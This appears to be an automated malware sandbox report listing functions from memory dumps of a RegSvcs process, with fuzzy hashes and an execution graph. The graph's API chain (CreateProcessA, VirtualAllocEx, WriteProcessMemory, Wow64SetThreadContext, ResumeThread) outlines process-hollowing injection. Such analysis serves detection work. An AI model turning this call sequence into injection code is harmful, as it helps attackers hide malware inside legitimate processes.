                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c12255be72ac0883f79273fbb7c7bff60b2b50352450b237740747525597613
                                                            • Instruction ID: 05b770bab0c3357bce1b18cdacfa195456bd25ecf03c9a1d569b575303b2bea2
                                                            • Opcode Fuzzy Hash: 0c12255be72ac0883f79273fbb7c7bff60b2b50352450b237740747525597613
                                                            • Instruction Fuzzy Hash: F131A234B006018FDB199B7498A4BAE7BA3BF8A311F14456DD846DB395EE35CC06CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD22A0 Relevance: .1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8e0eb7e75c995068fe83c3bc957faf43f16f8ec0074b01e2e00b2d178cba40e9
                                                            • Instruction ID: 3124d78ac2c45661e9f240890cae1af4bb09e0e97d44709b5282e6f306ed2ca5
                                                            • Opcode Fuzzy Hash: 8e0eb7e75c995068fe83c3bc957faf43f16f8ec0074b01e2e00b2d178cba40e9
                                                            • Instruction Fuzzy Hash: C731B2347002058FDB19AB74D8A4A6EBBA7BB8A711F10442DD806DB395EE35DC068BE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDDA21 Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5cb7c7e673ca37dbcde227d88bc1bd4e1aa42807f7137b95fa01b4c08b086111
                                                            • Instruction ID: 6ac892f662c36e2d0e16c327bfc87c3da15d856329f900961a8aa2a978228321
                                                            • Opcode Fuzzy Hash: 5cb7c7e673ca37dbcde227d88bc1bd4e1aa42807f7137b95fa01b4c08b086111
                                                            • Instruction Fuzzy Hash: 4B319831A0020A9BDF25DFA8D890A9EF7B7FF85304F14852AD505EB300EB70E946CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD2152 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3408156ed41319b437b97feff765d345869cb64fadd97a4641eabccad75cb38d
                                                            • Instruction ID: 3fd0ee280ec93a4d2548120f60c8013b1d786e870f4118b1e19ab001747536a9
                                                            • Opcode Fuzzy Hash: 3408156ed41319b437b97feff765d345869cb64fadd97a4641eabccad75cb38d
                                                            • Instruction Fuzzy Hash: 94313334E006459BCB15DFA8D8946AEFBB2FF89300F10C52AE946E7350DB70AC46CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD2160 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 841fa2db11a42e411b0ee799d7b7b5c8a95c1a2a0138215058fe79ea51e0c62d
                                                            • Instruction ID: 6269b2d47a9be07b217f63de1ee56fca10373dd54a928f96ae90b567b8d5911a
                                                            • Opcode Fuzzy Hash: 841fa2db11a42e411b0ee799d7b7b5c8a95c1a2a0138215058fe79ea51e0c62d
                                                            • Instruction Fuzzy Hash: F5311235E106459BDB19DF68D894AAEF7B2FF89300F10C52AE916E7350DB70AC46CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD3F60 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0f02495eb13c76ba5b3f945f55c39b26875a3dfdcd0d2ce1b02f66bcdb089ed
                                                            • Instruction ID: 6f5ec6cdc53c8cc65a0f8226c3a4eff7adc8120fe17942405e7721cd9d8752f5
                                                            • Opcode Fuzzy Hash: c0f02495eb13c76ba5b3f945f55c39b26875a3dfdcd0d2ce1b02f66bcdb089ed
                                                            • Instruction Fuzzy Hash: AE217E75F012159FDB10DF69E881EEEBBF2AB48710F144526E905EB390E775D8428BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD3F70 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e98e0c662f40e90a386e49099860dd0e388002b44399e81f2487265d58e01b8
                                                            • Instruction ID: 35e72414e5b9e1ca055b9497b60d3b7a6336261b03ea8ac6ee90b930ef41f4ba
                                                            • Opcode Fuzzy Hash: 0e98e0c662f40e90a386e49099860dd0e388002b44399e81f2487265d58e01b8
                                                            • Instruction Fuzzy Hash: 85213B75B012159FDB10DF69E880EAEBBF6FB48711F14442AE905E7394E771D8418BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD3511 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6aec53ef0f8b0a3d9fa99ac0057ede4ace9c2950d560dcc12cc17555d307738
                                                            • Instruction ID: a5fa7640993f92bbb0ae0af7ac8ede164189d903a2ae2f2e5920cb4a3e34c53d
                                                            • Opcode Fuzzy Hash: f6aec53ef0f8b0a3d9fa99ac0057ede4ace9c2950d560dcc12cc17555d307738
                                                            • Instruction Fuzzy Hash: 6521A571E052158BCF64EB68D8506EEF7B6FB89300F11497AE406EB340EA31D945CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD4080 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc69b70738d4cfb2ec896b478b4ddaf25eeb0783ad3d227f750fdbb24a38d458
                                                            • Instruction ID: 7a0a38e1fbcce11aa80ba6fbc2578e90763cc40ed11f2511878d2def171c0b3d
                                                            • Opcode Fuzzy Hash: bc69b70738d4cfb2ec896b478b4ddaf25eeb0783ad3d227f750fdbb24a38d458
                                                            • Instruction Fuzzy Hash: 9511A131B010254BDF14DA78DC54ABFB7ABABC9311F04853AD906E7344EE75DC028BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD42B9 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50cefd952bd6c660e9e9367a150fb7b58cf27753e2d9838fc52bb14ac2034598
                                                            • Instruction ID: 4e9fc63b3ad429cfa4b4403d31f535d4e97cb5554ecc3697e63862225a6ccbfe
                                                            • Opcode Fuzzy Hash: 50cefd952bd6c660e9e9367a150fb7b58cf27753e2d9838fc52bb14ac2034598
                                                            • Instruction Fuzzy Hash: A801F5317000100BDF2596AC8414B6FF7DBEBD6710F15443BE10ADB380E9B1DC0243A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDF248 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2ce92687389990dababf2bfc7949c0fcae8d0c9b61925e247bcd5cdb920450a
                                                            • Instruction ID: 334aa0ca5d7ce19b9a5e9d26b83c6ef9ce203a05ebe828a406aaf3f9e1ae939d
                                                            • Opcode Fuzzy Hash: e2ce92687389990dababf2bfc7949c0fcae8d0c9b61925e247bcd5cdb920450a
                                                            • Instruction Fuzzy Hash: EF014F397001121BEB25A6ACD896B7BABD7E7C9624F14883BE10BC7340ED25DC428791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD3D39 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e87f4270096179f4a3ee9ba44551eb155938596bc5ba9db2d7b091983c3b933
                                                            • Instruction ID: 2476d01ef92f5173657c04b63158b1713639e6850734dbf2d59140e7ed310f92
                                                            • Opcode Fuzzy Hash: 2e87f4270096179f4a3ee9ba44551eb155938596bc5ba9db2d7b091983c3b933
                                                            • Instruction Fuzzy Hash: A421C0B1901259AFCB00DF9AD884ACEFBB4FB49620F50852AE518A7340C374A554CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD406F Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ab0eb6d28629665b7b3e854ea17ff5e6cce22bb488cba46a86ab09a80f50bf8
                                                            • Instruction ID: b049fe152c93cf39a1e37d94986f5395220c63e4c0a2b5301a3155efd508f22e
                                                            • Opcode Fuzzy Hash: 6ab0eb6d28629665b7b3e854ea17ff5e6cce22bb488cba46a86ab09a80f50bf8
                                                            • Instruction Fuzzy Hash: B0018432B1001547DF54A968DC54BFFB6BBEBC5211F04853AD906E7344EE719C065B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDA3C2 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97d88a920579b5c956558f02de13ffa35280fd5089479389a6e9900a32ee50ea
                                                            • Instruction ID: ac939d4d8c349bd3991d46ebdfaa41ad75c4600e0c7be0982fa9143a60e099e5
                                                            • Opcode Fuzzy Hash: 97d88a920579b5c956558f02de13ffa35280fd5089479389a6e9900a32ee50ea
                                                            • Instruction Fuzzy Hash: E901D4347002500FDB619B7CD458B3AB7E6FB8A710F11883AE50ADB355EE22DC068791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD3D40 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1afa00461e4310ad61409d88e679cdfcfef0a86114d7c0eaba2bf261946a095
                                                            • Instruction ID: fe96b188384a0291b5d2edbdb7d392299b454b3e40545578781649d69806b787
                                                            • Opcode Fuzzy Hash: f1afa00461e4310ad61409d88e679cdfcfef0a86114d7c0eaba2bf261946a095
                                                            • Instruction Fuzzy Hash: 3111CFB1D01259AFCB00CF9AD884ACEFBB4FB49720F10852AE918A7340C374A954CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD42C8 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80bc0a4ee211bf892269284cde177a64515e214cceb4bbb71e9faffcfa645a65
                                                            • Instruction ID: a8130097a56df24ffb6200bfa65c135907d2e3782f94b2ca08a6fb8d367ec4a6
                                                            • Opcode Fuzzy Hash: 80bc0a4ee211bf892269284cde177a64515e214cceb4bbb71e9faffcfa645a65
                                                            • Instruction Fuzzy Hash: 75016D357000114BEF2499AD9459B6FE6DBEBCA710F24883AE50ACB344EEB5DC0287A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDF258 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37e51870ef69bab6d49613b1c204515f4912db63ff2c7e0be52b8a6bbd09f20e
                                                            • Instruction ID: aff16477edacfbf0c5a1f357799f16c624aeb28c0d004c23c1a8f67b3e442584
                                                            • Opcode Fuzzy Hash: 37e51870ef69bab6d49613b1c204515f4912db63ff2c7e0be52b8a6bbd09f20e
                                                            • Instruction Fuzzy Hash: 28018139B001121BDB259AAC9460B3FA7D7E7C9724F10883BE10BC7340EE25DC4287E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DDA3D0 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 099a968a306e2ad860ae725a92cf92a86cd005bfc3794b1152e8097e89699ed6
                                                            • Instruction ID: 21d516e8a941fa9bc937887128e4e08e5e5ad4c67b5fb5ef0790e1c13cccb3b6
                                                            • Opcode Fuzzy Hash: 099a968a306e2ad860ae725a92cf92a86cd005bfc3794b1152e8097e89699ed6
                                                            • Instruction Fuzzy Hash: A1016D347001114BDB60EA6CD458F3AB7D6F78A720F10882AE50EDB754EE21EC064B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD8390 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: abe0736dc8831ae8468f7967cc06e9ae170aef4768e9ca05c0c10866466c78ca
                                                            • Instruction ID: e96a9b70a4aab11885740f81bfc8b2066635fe4b0471128dd657bb803b4487b3
                                                            • Opcode Fuzzy Hash: abe0736dc8831ae8468f7967cc06e9ae170aef4768e9ca05c0c10866466c78ca
                                                            • Instruction Fuzzy Hash: C1F0AF317042418BDF269A58E990ABDF762FB51311F204427D80AD7255D631E90AE7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05DD6530 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2138761619.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5dd0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44c209fa156f2cb083167951d6ff5b0758ac975e0592e19dd56e08a6f15da595
                                                            • Instruction ID: 4c688ec220595427dc246261a9a714e32298763d554b3ab7b63cab47b577ea68
                                                            • Opcode Fuzzy Hash: 44c209fa156f2cb083167951d6ff5b0758ac975e0592e19dd56e08a6f15da595
                                                            • Instruction Fuzzy Hash: 66E0D871A00108A7DF10CEA4C94976EB7AEEB01304F2184A5D405DB204F537DA8183E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:10.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:207
                                                            Total number of Limit Nodes:7
                                                            execution_graph 26900 157d300 DuplicateHandle 26901 157d396 26900->26901 26958 77f9b48 26959 77f9b1c 26958->26959 26960 77f9b2b 26959->26960 26963 77fbd18 26959->26963 26980 77fbd08 26959->26980 26965 77fbd1b 26963->26965 26964 77fbd56 26964->26959 26965->26964 26997 77fc7c4 26965->26997 27001 77fc5a9 26965->27001 27007 77fc3eb 26965->27007 27013 77fc6ce 26965->27013 27017 77fc2ae 26965->27017 27023 77fc2f3 26965->27023 27031 77fc334 26965->27031 27036 77fc514 26965->27036 27042 77fc378 26965->27042 27047 77fc89a 26965->27047 27052 77fc19c 26965->27052 27056 77fc480 26965->27056 27060 77fc641 26965->27060 27065 77fc3c3 26965->27065 26981 77fbd0c 26980->26981 26982 77fbd56 26981->26982 26983 77fc19c 2 API calls 26981->26983 26984 77fc89a 2 API calls 26981->26984 26985 77fc378 2 API calls 26981->26985 26986 77fc514 2 API calls 26981->26986 26987 77fc334 2 API calls 26981->26987 26988 77fc2f3 4 API calls 26981->26988 26989 77fc2ae 2 API calls 26981->26989 26990 77fc6ce 2 API calls 26981->26990 26991 77fc3eb 2 API calls 26981->26991 26992 77fc5a9 2 API calls 26981->26992 26993 77fc7c4 2 API calls 26981->26993 26994 77fc3c3 2 API calls 26981->26994 26995 77fc641 2 API calls 26981->26995 26996 77fc480 2 API calls 26981->26996 26982->26959 26983->26982 26984->26982 26985->26982 26986->26982 26987->26982 26988->26982 26989->26982 26990->26982 26991->26982 26992->26982 26993->26982 26994->26982 26995->26982 26996->26982 27070 77f9478 26997->27070 27074 77f9473 26997->27074 26998 77fc7e8 27002 77fc5b1 27001->27002 27078 77fce10 27002->27078 27084 77fcdc0 27002->27084 27089 77fcdd0 27002->27089 27003 77fc5cd 27003->26964 27008 77fc3ec 27007->27008 27010 77fce10 2 API calls 27008->27010 27011 77fcdd0 2 API calls 27008->27011 27012 77fcdc0 2 API calls 27008->27012 27009 77fc5cd 27009->26964 27010->27009 27011->27009 27012->27009 27102 77fcd88 27013->27102 27107 77fcd77 27013->27107 27014 77fc6e6 27018 77fc2b4 27017->27018 27020 77fce10 2 API calls 27018->27020 27021 77fcdd0 2 API calls 27018->27021 27022 77fcdc0 2 API calls 27018->27022 27019 77fc5cd 27019->26964 27020->27019 27021->27019 27022->27019 27120 77f9568 27023->27120 27124 77f9560 27023->27124 27024 77fc5cd 27024->26964 27025 77fc2cc 27025->27024 27026 77fce10 2 API calls 27025->27026 27027 77fcdd0 2 API calls 27025->27027 27028 77fcdc0 2 API calls 27025->27028 27026->27024 27027->27024 27028->27024 27032 77fc357 27031->27032 27034 77f9478 WriteProcessMemory 27032->27034 27035 77f9473 WriteProcessMemory 27032->27035 27033 77fc4fe 27033->26964 27034->27033 27035->27033 27037 77fc2cc 27036->27037 27039 77fce10 2 API calls 27037->27039 27040 77fcdd0 2 API calls 27037->27040 27041 77fcdc0 2 API calls 27037->27041 27038 77fc5cd 27038->26964 27039->27038 27040->27038 27041->27038 27043 77fc37e 27042->27043 27128 77f8df8 27043->27128 27132 77f8df1 27043->27132 27044 77fc3a4 27044->26964 27048 77fc8a0 27047->27048 27050 77f9478 WriteProcessMemory 27048->27050 27051 77f9473 WriteProcessMemory 27048->27051 27049 77fc76a 27049->26964 27049->27049 27050->27049 27051->27049 27136 77f96f4 27052->27136 27141 77f9700 27052->27141 27053 77fc1dd 27053->26964 27058 77f92d8 Wow64SetThreadContext 27056->27058 27059 77f92e0 Wow64SetThreadContext 27056->27059 27057 77fc49a 27057->26964 27058->27057 27059->27057 27061 77fc38f 27060->27061 27062 77fc3a4 27060->27062 27063 77f8df8 ResumeThread 27061->27063 27064 77f8df1 ResumeThread 27061->27064 27062->26964 27063->27062 27064->27062 27066 77fc8b1 27065->27066 27067 77fc3d0 27065->27067 27068 77f9478 WriteProcessMemory 27066->27068 27069 77f9473 WriteProcessMemory 27066->27069 27067->26964 27068->27067 27069->27067 27071 77f94c0 WriteProcessMemory 27070->27071 27073 77f9517 27071->27073 27073->26998 27075 77f94c0 WriteProcessMemory 27074->27075 27077 77f9517 27075->27077 27077->26998 27079 77fcded 27078->27079 27081 77fce1f 27079->27081 27094 77f93b8 27079->27094 27098 77f93b0 27079->27098 27080 77fce04 27080->27003 27081->27003 27085 77fcdc4 27084->27085 27087 77f93b8 VirtualAllocEx 27085->27087 27088 77f93b0 VirtualAllocEx 27085->27088 27086 77fce04 27086->27003 27087->27086 27088->27086 27090 77fcdd3 27089->27090 27092 77f93b8 VirtualAllocEx 27090->27092 27093 77f93b0 VirtualAllocEx 27090->27093 27091 77fce04 27091->27003 27092->27091 27093->27091 27095 77f93bb VirtualAllocEx 27094->27095 27097 77f9435 27095->27097 27097->27080 27099 77f93b4 VirtualAllocEx 27098->27099 27101 77f9435 27099->27101 27101->27080 27103 77fcd8b 27102->27103 27112 77f92d8 27103->27112 27116 77f92e0 27103->27116 27104 77fcdb3 27104->27014 27108 77fcd7c 27107->27108 27110 77f92d8 Wow64SetThreadContext 27108->27110 27111 77f92e0 Wow64SetThreadContext 27108->27111 27109 77fcdb3 27109->27014 27110->27109 27111->27109 27113 77f92dc Wow64SetThreadContext 27112->27113 27115 77f936d 27113->27115 27115->27104 27117 77f92e3 Wow64SetThreadContext 27116->27117 27119 77f936d 27117->27119 27119->27104 27121 77f956b ReadProcessMemory 27120->27121 27123 77f95f7 27121->27123 27123->27025 27125 77f9564 ReadProcessMemory 27124->27125 27127 77f95f7 27125->27127 27127->27025 27129 77f8e38 ResumeThread 27128->27129 27131 77f8e69 27129->27131 27131->27044 27133 77f8e38 ResumeThread 27132->27133 27135 77f8e69 27133->27135 27135->27044 27138 77f96f8 27136->27138 27137 77f96d1 27137->27053 27138->27137 27139 77f98ee CreateProcessA 27138->27139 27140 77f994b 27139->27140 27140->27140 27142 77f9703 CreateProcessA 27141->27142 27144 77f994b 27142->27144 27144->27144 26902 77fcf60 26905 77fcf63 26902->26905 26903 77fd0eb 26905->26903 26906 77fb420 26905->26906 26907 77fd1e0 PostMessageW 26906->26907 26908 77fd24c 26907->26908 26908->26905 26909 157ad38 26913 157ae30 26909->26913 26922 157ae21 26909->26922 26910 157ad47 26914 157ae41 26913->26914 26915 157ae64 26913->26915 26914->26915 26931 157b11c 26914->26931 26936 157b0b8 26914->26936 26940 157b0c8 26914->26940 26915->26910 26916 157ae5c 26916->26915 26917 157b068 GetModuleHandleW 26916->26917 26918 157b095 26917->26918 26918->26910 26923 157ae41 26922->26923 26925 157ae64 26922->26925 26923->26925 26928 157b11c LoadLibraryExW 26923->26928 26929 157b0c8 LoadLibraryExW 26923->26929 26930 157b0b8 LoadLibraryExW 26923->26930 26924 157ae5c 26924->26925 26926 157b068 GetModuleHandleW 26924->26926 26925->26910 26927 157b095 26926->26927 26927->26910 26928->26924 26929->26924 26930->26924 26933 157b0c1 26931->26933 26935 157b122 26931->26935 26932 157b101 26932->26916 26933->26932 26944 157a870 26933->26944 26937 157b0c8 26936->26937 26938 157b101 26937->26938 26939 157a870 LoadLibraryExW 26937->26939 26938->26916 26939->26938 26941 157b0dc 26940->26941 26942 157b101 26941->26942 26943 157a870 LoadLibraryExW 26941->26943 26942->26916 26943->26942 26945 157b2a8 LoadLibraryExW 26944->26945 26947 157b321 26945->26947 26947->26932 26948 157d0b8 26949 157d0fe GetCurrentProcess 26948->26949 26951 157d150 GetCurrentThread 26949->26951 26952 157d149 26949->26952 26953 157d186 26951->26953 26954 157d18d GetCurrentProcess 26951->26954 26952->26951 26953->26954 26955 157d1c3 26954->26955 26956 157d1eb GetCurrentThreadId 26955->26956 26957 157d21c 26956->26957 27145 1574668 27146 157467a 27145->27146 27147 1574686 27146->27147 27149 1574779 27146->27149 27150 157479d 27149->27150 27154 1574878 27150->27154 27158 1574888 27150->27158 27156 1574888 27154->27156 27155 157498c 27155->27155 27156->27155 27162 157449c 27156->27162 27159 15748af 27158->27159 27160 157449c CreateActCtxA 27159->27160 27161 157498c 27159->27161 27160->27161 27163 1575918 CreateActCtxA 27162->27163 27165 15759db 27163->27165

                                                            Executed Functions

                                                            Function 0157D0A8 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0157D136
                                                            • GetCurrentThread.KERNEL32 ref: 0157D173
                                                            • GetCurrentProcess.KERNEL32 ref: 0157D1B0
                                                            • GetCurrentThreadId.KERNEL32 ref: 0157D209
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.2150140711.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_1570000_ECXXCuFHUVw.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 78ac036379bacd8712f2ceed7749c6f75ba501be852e3dd8c784b96f5a3ae7a9
                                                            • Instruction ID: be66f105d9de0bd0e7a84e2291cae1accbaf2f452e0c628a4da4afd963b3b363
                                                            • Opcode Fuzzy Hash: 78ac036379bacd8712f2ceed7749c6f75ba501be852e3dd8c784b96f5a3ae7a9
                                                            • Instruction Fuzzy Hash: A65155B0901349CFEB54CFAAE548BAEBBF1BF89310F24845AD509AB360D7345984CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0157D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0157D136
                                                            • GetCurrentThread.KERNEL32 ref: 0157D173
